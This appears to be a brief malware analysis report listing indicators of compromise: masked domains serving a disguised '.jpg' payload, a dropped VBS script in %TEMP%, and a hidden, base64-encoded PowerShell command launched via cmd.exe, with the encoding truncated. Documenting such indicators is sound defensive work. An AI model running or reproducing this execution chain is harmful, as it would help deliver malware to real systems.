Technical Information
- http://lo###abayev.xyz/temur/ads.jpg
- %TEMP%\xddxxdyu.vbs
- http://lo###abayev.xyz/temur/ads.jpg
- DNS ASK lo###abayev.xyz
- DNS ASK ex#####ro.freeddns.org
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\XddXxdYu.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -w hidden -noexit -enc JgAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQALgBJAG4AdgBvAGsAZQBDAG8AbQBtAGEAbgBkAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuAEkAbgB2AG8A...